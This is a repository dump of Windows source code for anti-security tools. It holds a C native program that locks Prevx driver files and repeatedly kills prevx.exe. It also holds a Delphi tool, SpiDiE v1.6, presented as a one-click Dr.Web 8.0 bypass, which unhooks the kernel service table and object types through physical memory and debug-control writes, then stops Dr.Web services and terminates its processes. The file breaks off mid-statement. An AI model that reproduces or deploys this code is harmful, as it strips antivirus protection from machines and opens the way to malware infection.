167 | *UniqueThread = ClientId.UniqueThread; 168 | 169 | return Status; 170 | } 171 | 172 | BOOL NTAPI DeviceIsRunning(IN PWSTR DeviceName) 173 | { 174 | UNICODE_STRING str; 175 | OBJECT_ATTRIBUTES attr; 176 | HANDLE hLink; 177 | NTSTATUS Status; 178 | 179 | BOOL result = FALSE; 180 | 181 | RtlInitUnicodeString(&str, DeviceName); 182 | InitializeObjectAttributes(&attr, &str, OBJ_CASE_INSENSITIVE, 0, 0); 183 | Status = NtOpenSymbolicLinkObject(&hLink, SYMBOLIC_LINK_QUERY, &attr); 184 | if (NT_SUCCESS(Status)) 185 | { 186 | result = TRUE; 187 | NtClose(hLink); 188 | } 189 | return result; 190 | } 191 | 192 | PVOID NTAPI mmalloc(DWORD uSize) 193 | { 194 | PVOID result = NULL; 195 | 196 | NtAllocateVirtualMemory(NtCurrentProcess(), &result, 0, &uSize, MEM_COMMIT | MEM_TOP_DOWN, PAGE_READWRITE); 197 | return result; 198 | } 199 | 200 | VOID NTAPI mmfree(PVOID Buffer) 201 | { 202 | DWORD memio = 0; 203 | NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &memio, MEM_RELEASE); 204 | } 205 | 206 | PVOID NTAPI 207 | AllocateInfoBuffer( 208 | IN SYSTEM_INFORMATION_CLASS InfoClass, 209 | PULONG ReturnLength 210 | ) 211 | { 212 | PVOID pBuffer = NULL; 213 | ULONG uSize = PAGE_SIZE; 214 | NTSTATUS Status; 215 | 216 | do 217 | { 218 | pBuffer = mmalloc(uSize); 219 | 220 | if (pBuffer != NULL) 221 | { 222 | Status = NtQuerySystemInformation(InfoClass, pBuffer, uSize, NULL); 223 | 224 | } else return NULL; 225 | 226 | if (Status == STATUS_INFO_LENGTH_MISMATCH) 227 | { 228 | mmfree(pBuffer); 229 | uSize *= 2; 230 | } 231 | 232 | } while (Status == STATUS_INFO_LENGTH_MISMATCH); 233 | 234 | if (NT_SUCCESS(Status)) 235 | { 236 | if (ReturnLength) *ReturnLength = uSize; 237 | return pBuffer; 238 | } 239 | 240 | if (pBuffer) mmfree(pBuffer); 241 | return NULL; 242 | } 243 | 244 | typedef struct _BEEP_PARAMS { 245 | ULONG uFrequency; 246 | ULONG uDuration; 247 | } BEEP_PARAMS; 248 | 249 | HANDLE PrepareBeep() 250 | { 251 | UNICODE_STRING str; 252 | OBJECT_ATTRIBUTES attr; 253 | IO_STATUS_BLOCK iost; 254 | HANDLE f; 255 | 256 | RtlInitUnicodeString(&str, L"\\Device\\Beep"); 257 | attr.Length = sizeof(OBJECT_ATTRIBUTES); 258 | attr.RootDirectory = 0; 259 | attr.ObjectName = &str; 260 | attr.Attributes = 0; 261 | attr.SecurityDescriptor = 0; 262 | attr.SecurityQualityOfService = 0; 263 | 264 | NtCreateFile(&f, GENERIC_READ | GENERIC_WRITE, &attr, &iost, 0, 0, 265 | 0, FILE_OPEN, 0, 0, 0); 266 | 267 | return f; 268 | } 269 | 270 | void DoBeep(HANDLE f) 271 | { 272 | BEEP_PARAMS param; 273 | IO_STATUS_BLOCK iost; 274 | 275 | param.uFrequency = 2500; 276 | param.uDuration = 10; 277 | 278 | NtDeviceIoControlFile(f, 0, 0, 0, &iost, 0x00010000, 279 | ¶m, sizeof(BEEP_PARAMS), 0, 0); 280 | } 281 | 282 | NTSTATUS NativeDeleteFile(PWSTR FileName) 283 | { 284 | HANDLE hFile; 285 | NTSTATUS Status; 286 | OBJECT_ATTRIBUTES attr; 287 | IO_STATUS_BLOCK iost; 288 | FILE_DISPOSITION_INFORMATION fDispositionInfo; 289 | FILE_BASIC_INFORMATION fBasicInfo; 290 | UNICODE_STRING TargetFileName; 291 | 292 | Status = STATUS_UNSUCCESSFUL; 293 | 294 | RtlInitUnicodeString(&TargetFileName, FileName); 295 | InitializeObjectAttributes(&attr, &TargetFileName, OBJ_CASE_INSENSITIVE, 0, 0); 296 | 297 | Status = NtOpenFile(&hFile, DELETE | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES, 298 | &attr, &iost, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, 299 | FILE_NON_DIRECTORY_FILE | FILE_OPEN_FOR_BACKUP_INTENT); 300 | if (NT_SUCCESS(Status)) 301 | { 302 | Status = NtQueryInformationFile(hFile, &iost, &fBasicInfo, sizeof(FILE_BASIC_INFORMATION), FileBasicInformation); 303 | if (NT_SUCCESS(Status)) 304 | { 305 | fBasicInfo.FileAttributes = FILE_ATTRIBUTE_NORMAL; 306 | NtSetInformationFile(hFile, &iost, &fBasicInfo, sizeof(FILE_BASIC_INFORMATION), FileBasicInformation); 307 | } 308 | fDispositionInfo.DeleteFile = TRUE; 309 | Status = NtSetInformationFile(hFile, &iost, &fDispositionInfo, sizeof(FILE_DISPOSITION_INFORMATION), FileDispositionInformation); 310 | NtClose(hFile); 311 | } 312 | return Status; 313 | } 314 | 315 | NTSTATUS 316 | NTAPI 317 | WriteBufferToFile( 318 | PWSTR lpFileName, 319 | PVOID Buffer, 320 | DWORD Size, 321 | BOOL Append 322 | ) 323 | { 324 | HANDLE fh; 325 | NTSTATUS ns; 326 | DWORD dwFlag; 327 | OBJECT_ATTRIBUTES attr; 328 | UNICODE_STRING str1; 329 | FILE_STANDARD_INFORMATION fs1; 330 | IO_STATUS_BLOCK iost; 331 | 332 | 333 | iost.Information = 0; 334 | 335 | if (RtlDosPathNameToNtPathName_U(lpFileName, &str1, NULL, NULL)) { 336 | 337 | ns = FILE_WRITE_ACCESS | SYNCHRONIZE; 338 | dwFlag = FILE_OVERWRITE_IF; 339 | 340 | if (Append) { 341 | ns |= FILE_READ_ACCESS; 342 | dwFlag = FILE_OPEN_IF; 343 | } 344 | 345 | InitializeObjectAttributes(&attr, &str1, OBJ_CASE_INSENSITIVE, 0, NULL); 346 | 347 | ns = NtCreateFile(&fh, ns, &attr, 348 | &iost, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag, 349 | FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0); 350 | 351 | if (NT_SUCCESS(ns)) 352 | { 353 | if (Append) 354 | { 355 | ns = NtQueryInformationFile(fh, &iost, &fs1, 356 | sizeof(FILE_STANDARD_INFORMATION), FileStandardInformation); 357 | if (NT_SUCCESS(ns)) { 358 | ns = NtWriteFile(fh, 0, NULL, NULL, &iost, Buffer, Size, &fs1.EndOfFile, NULL); 359 | } 360 | } 361 | else { 362 | ns = NtWriteFile(fh, 0, NULL, NULL, &iost, Buffer, Size, NULL, NULL); 363 | } 364 | NtFlushBuffersFile(fh, &iost); 365 | NtClose(fh); 366 | } 367 | RtlFreeUnicodeString(&str1); 368 | } 369 | return ns; 370 | } 371 | 372 | void ScanProcesses() 373 | { 374 | ULONG r; 375 | PSYSTEM_PROCESSES_INFORMATION Info, p; 376 | HANDLE hProcess; 377 | NTSTATUS Status; 378 | OBJECT_ATTRIBUTES attr; 379 | CLIENT_ID cid; 380 | 381 | 382 | p = (PSYSTEM_PROCESSES_INFORMATION)AllocateInfoBuffer(SystemProcessInformation, &r); 383 | if (p == NULL) return; 384 | Info = p; 385 | for (;;) 386 | { 387 | if (Info->ProcessName.Buffer) 388 | { 389 | if (strcmpiW(Info->ProcessName.Buffer, L"prevx.exe") == 0) 390 | { 391 | cid.UniqueProcess = (HANDLE)Info->ProcessId; 392 | cid.UniqueThread = 0; 393 | InitializeObjectAttributes(&attr, 0, 0, 0, 0); 394 | 395 | Status = NtOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &attr, &cid); 396 | if (NT_SUCCESS(Status)) 397 | { 398 | NtTerminateProcess(hProcess, 0); 399 | NtClose(hProcess); 400 | } 401 | DoBeep(hBeep); 402 | } 403 | } 404 | if (Info->NextEntryDelta == 0) break; 405 | Info = (PSYSTEM_PROCESSES_INFORMATION)(((PUCHAR)Info)+ Info->NextEntryDelta); 406 | } 407 | mmfree(p); 408 | } 409 | 410 | void BlockDriverAtDisk(PWSTR lpFileName) 411 | { 412 | HANDLE hFile; 413 | OBJECT_ATTRIBUTES attr; 414 | IO_STATUS_BLOCK iost; 415 | UNICODE_STRING TargetFileName; 416 | LARGE_INTEGER cb, bo; 417 | NTSTATUS Status; 418 | 419 | RtlInitUnicodeString(&TargetFileName, lpFileName); 420 | InitializeObjectAttributes(&attr, &TargetFileName, OBJ_CASE_INSENSITIVE, 0, 0); 421 | 422 | Status = NtCreateFile(&hFile, FILE_READ_ACCESS | FILE_WRITE_ACCESS | SYNCHRONIZE, &attr, 423 | &iost, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF, 424 | FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0); 425 | if (NT_SUCCESS(Status)) 426 | { 427 | Status = NtWriteFile(hFile, 0, 0, 0, &iost, buf, sizeof(buf), 0, 0); 428 | 429 | if (NT_SUCCESS(Status)) 430 | { 431 | bo.HighPart = 0; 432 | bo.LowPart = 0; 433 | 434 | cb.HighPart = 0; 435 | cb.LowPart = sizeof(buf); 436 | 437 | NtLockFile(hFile, 0, 0, 0, &iost, &bo, &cb, 0, TRUE, TRUE); 438 | } 439 | } 440 | } 441 | 442 | void NtProcessStartup( PSTARTUP_ARGUMENT Argument ) 443 | { 444 | HANDLE ThreadHandle, UniqueThread; 445 | NTSTATUS Status; 446 | 447 | if (DeviceIsRunning(L"\\??\\pxkbf")) 448 | { 449 | strcpyW(buf, DRVROOT); 450 | strcatW(buf, PXRTS); 451 | BlockDriverAtDisk(buf); 452 | 453 | strcpyW(buf, DRVROOT); 454 | strcatW(buf, PXSCAN); 455 | BlockDriverAtDisk(buf); 456 | 457 | hBeep = PrepareBeep(); 458 | 459 | Status = NativeCreateThread(&ThreadRoutine, &ThreadHandle, &UniqueThread, NtCurrentProcess()); 460 | if (NT_SUCCESS(Status)) 461 | { 462 | NtClose(ThreadHandle); 463 | } 464 | RtlSetProcessIsCritical(TRUE, NULL, FALSE); 465 | 466 | while ( 1 ) 467 | { 468 | NtSleep(1000); 469 | ScanProcesses(); 470 | } 471 | if (hBeep) NtClose(hBeep); 472 | } 473 | 474 | NtTerminateProcess(NtCurrentProcess(), 0); 475 | __asm 476 | { 477 | jmp Daniel 478 | } 479 | } -------------------------------------------------------------------------------- /Source/SpiDiE/SPiDiE_by_rinn_2012/SpiDiE_v1.6/SpiDiE.dpr: -------------------------------------------------------------------------------- 1 | {$E EXE} 2 | {$IMAGEBASE $00400000} 3 | {$R-} 4 | {$Q-} 5 | {$IFDEF minimum} 6 | program Spidie; 7 | {$ENDIF} 8 | unit Spidie; 9 | interface 10 | 11 | uses 12 | Windows, WinNative, ObjList2, Loader, LDasm, RTL, Ring0; 13 | 14 | implementation 15 | 16 | type 17 | _SERVICE_DESCRIPTOR_ENTRY = record 18 | ServiceTableBase: PPVOID; 19 | ServiceCounterTableBase: PPVOID; //Used only in checked build 20 | NumberOfServices: DWORD; 21 | ParamTableBase: PBYTE; 22 | end; 23 | SERVICE_DESCRIPTOR_ENTRY = _SERVICE_DESCRIPTOR_ENTRY; 24 | PSERVICE_DESCRIPTOR_ENTRY = ^_SERVICE_DESCRIPTOR_ENTRY; 25 | 26 | _DWBUF = array[0..0] of DWORD; 27 | DWBUF = _DWBUF; 28 | PDWBUF = ^_DWBUF; 29 | 30 | _SYSINFO_BUFFER = record 31 | Count: ULONG; 32 | ModInfo: array[0..0] of SYSTEM_MODULE_INFORMATION; 33 | end; 34 | SYSINFO_BUFFER = _SYSINFO_BUFFER; 35 | PSYSINFO_BUFFER = ^_SYSINFO_BUFFER; 36 | 37 | var 38 | pntkernel: PVOID; 39 | PsProcessType: OBJECT_TYPE; 40 | CmKeyTypeInit: OBJECT_TYPE_INITIALIZER; 41 | CmpKeyObjectType: OBJECT_TYPE; 42 | KernelSize: DWORD; 43 | KernelBase, pOriginalSDT: PVOID; 44 | MmSystemRangeStart: Cardinal; 45 | CmpKeyObjectTypeAddress: PVOID; 46 | 47 | const 48 | IMAGE_ORDINAL_FLAG32 = $80000000; 49 | WINXP_SDT_ENTRIES_COUNT = 284; 50 | 51 | cm2600_7600: array[0..6] of BYTE = ($C7, $45, $B4, $3F, $00, $0F, $00); //C7 45 B4 3F 00 0F 00 52 | cmpobject_2600: array[0..9] of BYTE = ($57, $8D, $45, $E0, $50, $FF, $75, $DC, $FF, $35); 53 | DrWebProcessesMax = 5; 54 | DrWebProcesses: array[0..DrWebProcessesMax] of PWideChar = ( 55 | 'spideragent.exe', 'dwengine.exe', 'dwscanner.exe', 'dwarkdaemon.exe', 'dwnetfilter.exe', 'dwservice.exe'); 56 | KeServiceDescriptorTable: PAnsiChar = 'KeServiceDescriptorTable'; 57 | NtFlushKeyStr: PAnsiChar = 'NtFlushKey'; 58 | SpiDiE_Msg: PWideChar = 'meow'; 59 | 60 | function FindOrigSDT(const pKernel: pointer; kernelBase: DWORD): DWORD; 61 | var 62 | t: DWORD; 63 | p1: PChar; 64 | begin 65 | result := 0; 66 | t := DWORD(FastGetProcAddress(HINST(pKernel), KeServiceDescriptorTable)) - DWORD(pKernel); 67 | p1 := pKernel; 68 | repeat 69 | if ((PWORD(p1)^ = $05C7) and (PDWORD(p1 + 2)^ = t + kernelBase)) then 70 | begin 71 | result := PDWORD(p1 + 6)^ - kernelBase; 72 | break; 73 | end; 74 | inc(p1); 75 | until false; 76 | end; 77 | 78 | function GetKeServiceDescriptorTable(fPtr: PChar): PVOID; 79 | var 80 | c: DWORD; 81 | begin 82 | for c := 0 to 4095 do 83 | if (PWORD(fPtr + c)^ = $888D) then 84 | begin 85 | result := PPVOID(fPtr + c + 2)^; 86 | exit; 87 | end; 88 | result := nil; 89 | end; 90 | 91 | procedure GetCmKeyObjectInitializer(pObjectBody: POBJECT_TYPE_INITIALIZER; const KernelBaseAddress: DWORD); stdcall; 92 | var 93 | RawSize, x, y: DWORD; 94 | RawData, p1: PChar; 95 | i, Length: integer; 96 | dos_header: ^IMAGE_DOS_HEADER; 97 | pe_headers: PPE_HEADER_BLOCK; 98 | u: integer; 99 | Mov_OpCode1: BYTE; 100 | bFound: boolean; 101 | 102 | function CheckSignature(var signsize: dword): BOOLEAN; 103 | var 104 | c: integer; 105 | begin 106 | result := true; 107 | signsize := 7; 108 | for c := 0 to 6 do 109 | if (cm2600_7600[c] <> PBYTE(RawData + c)^) then 110 | begin 111 | result := false; 112 | break; 113 | end; 114 | end; 115 | 116 | begin 117 | p1 := pntkernel; 118 | dos_header := pointer(p1); 119 | pe_headers := pointer(p1 + dos_header^._lfanew); 120 | Mov_OpCode1 := $D0; 121 | 122 | bFound := false; 123 | for u := 0 to pe_headers^.FileHeader.NumberOfSections - 1 do 124 | begin 125 | if bFound then break; 126 | RawData := pointer(p1 + pe_headers^.Sections[u].PointerToRawData); 127 | RawSize := pe_headers^.Sections[u].SizeOfRawData - 12; 128 | x := 0; 129 | while (RawSize > 512) do 130 | begin 131 | if CheckSignature(x) then 132 | begin 133 | inc(RawData, x); 134 | dec(RawSize, x); 135 | Length := SizeOfProc(Pointer(RawData)); 136 | 137 | for i := 0 to Length do 138 | begin 139 | if (PBYTE(RawData + i)^ = $C7) 140 | and (PBYTE(RawData + i + 1)^ = $45) 141 | and (PBYTE(RawData + i + 2)^ = Mov_OpCode1) then 142 | //mov [ebp+var_30], 143 | begin 144 | y := 3; 145 | x := PULONG(RawData + i + y)^; 146 | 147 | x := x - KernelBaseAddress; 148 | pObjectBody^.CloseProcedure := pointer(KernelBaseAddress + x); //CmpCloseKeyObject 149 | 150 | x := SizeOfCode(Pointer(RawData + i), nil); 151 | if (x = 0) then inc(x); 152 | inc(y, x); 153 | x := PULONG(RawData + i + y)^; 154 | x := x - KernelBaseAddress; 155 | pObjectBody^.DeleteProcedure := pointer(KernelBaseAddress + x); //CmpDeleteKeyObject 156 | 157 | x := SizeOfCode(Pointer(RawData + i), nil); 158 | if (x = 0) then inc(x); 159 | inc(y, x); 160 | x := PULONG(RawData + i + y)^; 161 | x := x - KernelBaseAddress; 162 | pObjectBody^.ParseProcedure := pointer(KernelBaseAddress + x); //CmpParseKey 163 | 164 | bFound := true; 165 | break; 166 | end; 167 | end; 168 | if bFound then break; 169 | end; 170 | inc(RawData); 171 | dec(RawSize); 172 | end; 173 | end; 174 | end; 175 | 176 | function GetCmpKeyObjectTypeAddress(KernelBaseAddress: DWORD): PVOID; 177 | var 178 | RawSize, x: DWORD; 179 | RawData, p1: PChar; 180 | dos_header: ^IMAGE_DOS_HEADER; 181 | pe_headers: PPE_HEADER_BLOCK; 182 | u: integer; 183 | bFound: boolean; 184 | 185 | function CheckSignature(var signsize: dword): BOOLEAN; 186 | var 187 | c: integer; 188 | begin 189 | result := true; 190 | signsize := 10; 191 | for c := 0 to 9 do 192 | if (cmpobject_2600[c] <> PBYTE(RawData + c)^) then 193 | begin 194 | result := false; 195 | break; 196 | end; 197 | end; 198 | 199 | begin 200 | p1 := pntkernel; 201 | dos_header := pointer(p1); 202 | pe_headers := pointer(p1 + dos_header^._lfanew); 203 | result := nil; 204 | bFound := false; 205 | for u := 0 to pe_headers^.FileHeader.NumberOfSections - 1 do 206 | begin 207 | if bFound then break; 208 | RawData := pointer(p1 + pe_headers^.Sections[u].PointerToRawData); 209 | RawSize := pe_headers^.Sections[u].SizeOfRawData - 12; 210 | x := 0; 211 | while (RawSize > 512) do 212 | begin 213 | if CheckSignature(x) then 214 | begin 215 | inc(RawData, x); 216 | x := PULONG(RawData)^; 217 | result := pointer(x); 218 | break; 219 | end; 220 | inc(RawData); 221 | dec(RawSize); 222 | end; 223 | end; 224 | 225 | end; 226 | 227 | var 228 | textbuf: LBuf; 229 | 230 | procedure GetOriginalSystemState(); 231 | var 232 | psdt: PVOID; 233 | p1: PChar; 234 | modinf: SYSINFO_BUFFER; 235 | KernelBaseAddress, bytesIO: ULONG; 236 | pe_headers: PPE_HEADER_BLOCK; 237 | dos_header: ^IMAGE_DOS_HEADER; 238 | begin 239 | bytesIO := 0; 240 | ZwQuerySystemInformation(SystemModuleInformation, @modinf, sizeof(SYSINFO_BUFFER), @bytesIO); 241 | if (bytesIO = 0) then exit; 242 | strcpyW(textbuf, KI_SHARED_USER_DATA.NtSystemRoot); 243 | strcatW(textbuf, '\system32\'); 244 | RtlAnsiToUnicode(strendW(textbuf), @modinf.ModInfo[0].ImageName[modinf.ModInfo[0].ModuleNameOffset]); 245 | KernelBase := modinf.ModInfo[0].Base; 246 | pntkernel := PELdrLoadLibrary(textbuf, nil, modinf.ModInfo[0].Base); 247 | if (pntkernel <> nil) then 248 | begin 249 | KernelSize := PEGetVirtualSize(pntkernel); 250 | psdt := PChar(pntkernel) + FindOrigSDT(pntkernel, DWORD(modinf.ModInfo[0].Base)); 251 | pOriginalSDT := nil; 252 | bytesIO := WINXP_SDT_ENTRIES_COUNT * sizeof(DWORD); 253 | ZwAllocateVirtualMemory(NtCurrentProcess, @pOriginalSDT, 0, @bytesIO, MEM_COMMIT or MEM_TOP_DOWN, PAGE_READWRITE); 254 | memcopy(pOriginalSDT, psdt, WINXP_SDT_ENTRIES_COUNT * sizeof(DWORD)); 255 | 256 | memzero(@CmKeyTypeInit, sizeof(OBJECT_TYPE_INITIALIZER)); 257 | 258 | p1 := pntkernel; 259 | dos_header := pntkernel; 260 | pe_headers := pointer(p1 + dos_header^._lfanew); 261 | KernelBaseAddress := (DWORD(KernelBase) - pe_headers^.OptionalHeader.ImageBase); 262 | 263 | //get original parseprocedure 264 | GetCmKeyObjectInitializer(@CmKeyTypeInit, KernelBaseAddress); 265 | CmpKeyObjectTypeAddress := GetCmpKeyObjectTypeAddress(DWORD(KernelBase)); 266 | end; 267 | end; 268 | 269 | procedure StopService(hscm: SC_HANDLE; ServiceName: PWideChar); 270 | var 271 | Actions: SERVICE_FAILURE_ACTIONSW; 272 | Action: SC_ACTION; 273 | service1: SERVICE_STATUS; 274 | hsrv: SC_HANDLE; 275 | begin 276 | hsrv := OpenServiceW(hscm, ServiceName, SERVICE_ALL_ACCESS); 277 | if (hsrv <> 0) then 278 | begin 279 | Actions.dwResetPeriod := 100; 280 | Actions.lpRebootMsg := nil; 281 | Actions.lpCommand := nil; 282 | Actions.cActions := 1; 283 | Actions.lpsaActions := @Action; 284 | Action._Type := SC_ACTION_NONE; 285 | Action.Delay := 0; 286 | ChangeServiceConfig2W(hsrv, SERVICE_CONFIG_FAILURE_ACTIONS, @Actions); 287 | ControlService(hsrv, SERVICE_CONTROL_STOP, @service1); 288 | CloseServiceHandle(hsrv); 289 | end; 290 | end; 291 | 292 | procedure DisableDwEngine(); 293 | var 294 | hscm: SC_HANDLE; 295 | begin 296 | hscm := OpenSCManagerW(nil, nil, SC_MANAGER_ALL_ACCESS); 297 | if (hscm <> 0) then 298 | begin 299 | StopService(hscm, 'drwebengine'); 300 | StopService(hscm, 'drwebavservice'); 301 | StopService(hscm, 'drwebnetfilter'); 302 | CloseServiceHandle(hscm); 303 | end; 304 | end; 305 | 306 | function MapPhysMem(hPhyMem: THANDLE; PhyAddr: PDWORD; Length: PDWORD; VirtAddress: PPVOID): PVOID; stdcall; 307 | var 308 | ViewBase: LARGE_INTEGER; 309 | begin 310 | VirtAddress^ := nil; 311 | ViewBase.LowPart := 0; 312 | ViewBase.HighPart := 0; 313 | ViewBase.QuadPart := int64(PhyAddr^); 314 | ZwMapViewOfSection(hPhyMem, NtCurrentProcess, VirtAddress, 0, Length^, @viewBase, Length, ViewShare, 0, PAGE_READWRITE); 315 | PhyAddr^ := DWORD(viewBase.LowPart); 316 | result := pointer(viewBase.LowPart); 317 | end; 318 | 319 | procedure UnmapPhysMem(VirtualAddr: PVOID); 320 | begin 321 | ZwUnmapViewOfSection(NtCurrentProcess, VirtualAddr); 322 | end; 323 | 324 | function RemoveDwProtHooks(): boolean; 325 | var 326 | start: DWORD; 327 | serviceTable: PDWBUF; 328 | len, wantedAddr: DWORD; 329 | ptr, pAddr: PChar; 330 | hPhysMem: THANDLE; 331 | p1, sdtAddr: PVOID; 332 | bytesIO: ULONG; 333 | Status: NTSTATUS; 334 | rv: MEMORY_CHUNKS; 335 | serviceTableAddress: ULONG; 336 | entries: array[0..3] of SERVICE_DESCRIPTOR_ENTRY; 337 | begin 338 | result := false; 339 | GetOriginalSystemState(); 340 | 341 | sdtAddr := FastGetProcAddress(HINST(pntkernel), KeServiceDescriptorTable); 342 | p1 := PChar(sdtAddr) - DWORD(pntkernel) + DWORD(KernelBase) - sizeof(entries); 343 | 344 | if (p1 <> nil) then 345 | begin 346 | memzero(@entries, sizeof(entries)); 347 | rv.Address := p1; 348 | rv.Data := @entries; 349 | rv.Length := sizeof(entries); 350 | Status := ZwSystemDebugControl(DbgReadVirtualMemory, @rv, sizeof(MEMORY_CHUNKS), nil, 0, @bytesIO); 351 | if (Status = STATUS_SUCCESS) then 352 | begin 353 | hPhysMem := OpenPhysicalMemory(SECTION_MAP_READ or SECTION_MAP_WRITE); 354 | if (hPhysMem <> 0) then 355 | begin 356 | serviceTableAddress := DWORD(entries[0].ServiceTableBase); 357 | pAddr := PChar(serviceTableAddress) - MmSystemRangeStart; 358 | wantedAddr := ULONG(pAddr); 359 | len := PAGE_SIZE; 360 | if (MapPhysMem(hPhysMem, @pAddr, @len, @ptr) <> nil) then 361 | begin 362 | start := wantedAddr - ULONG(pAddr); 363 | serviceTable := @ptr[start]; 364 | memcopy(serviceTable, pOriginalSDT, sizeof(DWORD) * entries[0].NumberOfServices); 365 | UnMapPhysMem(ptr); 366 | end; 367 | ZwClose(hPhysMem); 368 | end; 369 | 370 | //Unhook PsProcessType 371 | memzero(@PsProcessType, sizeof(OBJECT_TYPE)); 372 | p1 := PChar(FastGetProcAddress(HINST(pntkernel), 'PsProcessType')) - DWORD(pntkernel) + DWORD(KernelBase); 373 | rv.Address := p1; 374 | rv.Data := @p1; 375 | rv.Length := sizeof(DWORD); 376 | Status := ZwSystemDebugControl(DbgReadVirtualMemory, @rv, sizeof(MEMORY_CHUNKS), nil, 0, @bytesIO); 377 | if (Status = STATUS_SUCCESS) then 378 | begin 379 | rv.Address := p1; 380 | rv.Data := @PsProcessType; 381 | rv.Length := sizeof(OBJECT_TYPE); 382 | Status := ZwSystemDebugControl(DbgReadVirtualMemory, @rv, sizeof(MEMORY_CHUNKS), nil, 0, @bytesIO); 383 | if (Status = STATUS_SUCCESS) then 384 | begin 385 | bytesIO := 0; 386 | rv.Address := pointer(DWORD(p1) + $90); //OpenProcedure removal 387 | rv.Data := @bytesIO; 388 | rv.Length := sizeof(DWORD); 389 | Status := ZwSystemDebugControl(DbgWriteVirtualMemory, @rv, sizeof(MEMORY_CHUNKS), nil, 0, @bytesIO); 390 | result := (Status = STATUS_SUCCESS); 391 | end; 392 | end; 393 | 394 | //Unhook CmKeyType 395 | if (CmpKeyObjectTypeAddress <> nil) then 396 | begin 397 | rv.Address := CmpKeyObjectTypeAddress; 398 | rv.Data := @p1; 399 | rv.Length := sizeof(DWORD); 400 | Status := ZwSystemDebugControl(DbgReadVirtualMemory, @rv, sizeof(MEMORY_CHUNKS), nil, 0, @bytesIO); 401 | if (Status = STATUS_SUCCESS) then 402 | begin 403 | rv.Address := p1; 404 | rv.Data := @CmpKeyObjectType; 405 | rv.Length := sizeof(OBJECT_TYPE); 406 | Status := ZwSystemDebugControl(DbgReadVirtualMemory, @rv, sizeof(MEMORY_CHUNKS), nil, 0, @bytesIO); 407 | if (Status = STATUS_SUCCESS) then 408 | begin 409 | rv.Address := pointer(DWORD(p1) + $9C); //ParseProcedure removal 410 | rv.Data := @CmKeyTypeInit.ParseProcedure; 411 | rv.Length := sizeof(DWORD); 412 | Status := ZwSystemDebugControl(DbgWriteVirtualMemory, @rv, sizeof(MEMORY_CHUNKS), nil, 0, @bytesIO); 413 | result := (Status = STATUS_SUCCESS); 414 | end; 415 | end; 416 | end; 417 | end; 418 | end; 419 | if (pOriginalSDT <> nil) then 420 | begin 421 | bytesIO := 0; 422 | ZwFreeVirtualMemory(THANDLE(-1), @pOriginalSDT, @bytesIO, MEM_RELEASE); 423 | end; 424 | end; 425 | 426 | function ShowMessage(PStr: PWideChar; Buttons: DWORD): DWORD; stdcall; 427 | begin 428 | result := MessageBoxW(GetDesktopWindow(), PStr, SpiDiE_Msg, Buttons); 429 | end; 430 | 431 | function KillProcess(ProcessId: Cardinal; ExitCode: DWORD = $BADC0DE): boolean; stdcall; 432 | var 433 | f: THANDLE; 434 | attr: OBJECT_ATTRIBUTES; 435 | cid1: CLIENT_ID; 436 | begin 437 | result := false; 438 | cid1.UniqueProcess := ProcessId; 439 | cid1.UniqueThread := 0; 440 | InitializeObjectAttributes(@attr, nil, 0, 0, nil); 441 | f := 0; 442 | if (ZwOpenProcess(@f, PROCESS_ALL_ACCESS, @attr, @cid1) = STATUS_SUCCESS) then 443 | if (f <> 0) then 444 | begin 445 | result := (ZwTerminateProcess(f, ExitCode) = STATUS_SUCCESS); 446 | ZwClose(f); 447 | end; 448 | end; 449 | 450 | procedure FindAndKillDwEngine(); 451 | var 452 | pp1: PSYSTEM_PROCESSES; 453 | membuf: PChar; 454 | bytesIO: DWORD; 455 | i: integer; 456 | buf: LBuf; 457 | begin 458 | membuf := nil; 459 | bytesIO := $400000; 460 | ZwAllocateVirtualMemory(NtCurrentProcess, @membuf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 461 | if (membuf = nil) then exit; 462 | if (ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, membuf, bytesIO, @bytesIO) = STATUS_SUCCESS) then 463 | begin 464 | pp1 := PSYSTEM_PROCESSES(membuf); 465 | while (1 = 1) do 466 | begin 467 | memzero(@buf, sizeof(LBuf)); 468 | if (pp1^.ProcessName.PStr <> nil) then 469 | for i := 0 to DrWebProcessesMax do 470 | if (strcmpiW(pp1^.ProcessName.PStr, DrWebProcesses[i]) = 0) then 471 | KillProcess(pp1^.ProcessId, 0); 472 | 473 | if (pp1^.NextEntryOffset = 0) then break; 474 | pp1 := PSYSTEM_PROCESSES(PChar(pp1) + pp1^.NextEntryOffset); 475 | end; 476 | end; 477 | bytesIO := 0; 478 | ZwFreeVirtualMemory(NtCurrentProcess, @membuf, @bytesIO, MEM_RELEASE); 479 | end; 480 | 481 | function DrWebIsRunning(): BOOLEAN; stdcall; 482 | var 483 | str1: UNICODE_STRING; 484 | attr: OBJECT_ATTRIBUTES; 485 | id1: THANDLE; 486 | begin 487 | result := false; 488 | RtlInitUnicodeString(@str1, '\??\DwProt'); 489 | InitializeObjectAttributes(@attr, @str1, OBJ_CASE_INSENSITIVE, 0, nil); 490 | if (ZwOpenSymbolicLinkObject(@id1, SYMBOLIC_LINK_QUERY, @attr) = STATUS_SUCCESS) then 491 | begin 492 | result := true; 493 | ZwClose(id1); 494 | end; 495 | end; 496 | 497 | procedure main(); 498 | begin 499 | if (DrWebIsRunning()) then 500 | begin 501 | if (RemoveDwProtHooks()) then 502 | begin 503 | DisableDwEngine(); 504 | FindAndKillDwEngine(); 505 | end; 506 | end else 507 | ShowMessage('Dr.Web not found', MB_OK); 508 | end; 509 | 510 | var 511 | osver: OSVERSIONINFOEXW; 512 | sysinfo: SYSTEM_BASIC_INFORMATION; 513 | bytesIO: DWORD; 514 | begin 515 | osver.old.dwOSVersionInfoSize := sizeof(osver.old); 516 | RtlGetVersion(@osver); 517 | if (osver.old.dwBuildNumber = 2600) then 518 | begin 519 | ShowMessage('dwprot 8.0.0.11010 bypass by rin, Nov 2012'#13#10#13#10 + 520 | 'Based on EP_X0FF''s SpiDiE v1.5 from 2009'#13#10 + 521 | 'Bypassing of all Dr.Web 8.0 SP in one click :)', MB_OK); 522 | 523 | if 